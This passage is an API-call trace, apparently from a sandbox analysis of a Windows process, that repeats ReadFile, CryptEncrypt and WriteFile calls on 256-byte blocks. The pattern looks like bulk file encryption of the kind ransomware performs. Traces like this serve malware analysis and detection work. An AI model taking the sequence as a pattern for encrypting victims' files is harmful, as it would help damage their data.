| out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.509] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.509] GetLastError () returned 0x0 [0167.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.510] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.510] GetLastError () returned 0x0 [0167.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.511] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.511] GetLastError () returned 0x0 [0167.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.512] GetLastError () returned 0x0 [0167.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.512] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.513] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.513] GetLastError () returned 0x0 [0167.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.514] GetLastError () returned 0x0 [0167.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.514] CryptEncrypt (in: 